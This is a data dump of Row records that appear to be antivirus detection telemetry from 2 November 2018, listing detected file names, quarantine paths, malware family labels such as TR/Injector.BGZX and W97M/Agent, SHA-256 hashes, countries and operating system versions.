  Row(detection=Row(filename='j111.exe', filepath='J111.exe', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T16:18:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-131753-dced3fd3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-131753-DCED3FD3', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:21:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061415-7e629e02', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061415-7E629E02', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-100808-29f365ef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1908d236\\AVSCAN-20181102-100641-1F5906F8\\AVSCAN-20181102-100808-29F365EF', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:08:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052216-3b8dd624', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052216-3B8DD624', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-152548-6efef4bd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-152548-6EFEF4BD', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:28:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa2404.24481\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa2404.24481\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T05:15:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054232-101c0fc1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054232-101C0FC1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-093613-8ec92f3b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c7bd4cdb\\AVSCAN-20181102-093559-8CA4E779\\AVSCAN-20181102-093613-8EC92F3B', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='MM', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:06:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061955-49019b86', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061955-49019B86', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061208-33117291', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061208-33117291', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='favorites.bat', filepath='C:\\Users\\X\\Favorites\\Favorites.bat', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6bbada565c292d9f92dd7bdf3a9a87ad84ad76ef259c6462ed674488ae9fc572', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:46:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052236-478a81ac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052236-478A81AC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053518-0d93e1dc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053518-0D93E1DC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061008-eb25f24c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061008-EB25F24C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062551-1d918849', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062551-1D918849', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051345-0b11f8c4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051345-0B11F8C4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062524-0d326109', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062524-0D326109', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061934-3cf3db23', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061934-3CF3DB23', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052012-f193d631', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052012-F193D631', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052414-822cc209', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052414-822CC209', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060418-1ad39e11', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060418-1AD39E11', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055038-31c0d9dc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055038-31C0D9DC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053924-a06e172e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053924-A06E172E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061153-29daf22e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061153-29DAF22E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052119-19e0c624', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052119-19E0C624', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060527-43fdcd91', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060527-43FDCD91', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052053-0a60456e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052053-0A60456E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054941-103b5183', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054941-103B5183', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060424-1e8d9c39', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060424-1E8D9C39', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054921-03f0c5b3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054921-03F0C5B3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062427-eba0f9bd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062427-EBA0F9BD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053616-305c5ed4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053616-305C5ED4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054101-d9da27fc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054101-D9DA27FC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061108-0efe909a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061108-0EFE909A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062621-2f1fe5e2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062621-2F1FE5E2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060425-1eef27c3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060425-1EEF27C3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T09:18:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052032-fd7d6b4d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052032-FD7D6B4D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052603-c2d089db', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052603-C2D089DB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062417-e5bc9190', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062417-E5BC9190', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052421-861ba25a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052421-861BA25A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060718-863828f1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060718-863828F1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050548-eeeafe3b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050548-EEEAFE3B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051935-db78bacb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051935-DB78BACB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055733-2987700f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055733-2987700F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054409-4a493741', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054409-4A493741', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T15:47:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051726-8ec416be', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051726-8EC416BE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054135-ee373e2e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054135-EE373E2E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062258-b643e8df', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062258-B643E8DF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053817-787abc4d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053817-787ABC4D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055729-26ffe9c1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055729-26FFE9C1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051906-ca245467', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051906-CA245467', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T07:55:07Z'), dt=datetime.date(2018, 11, 2)),
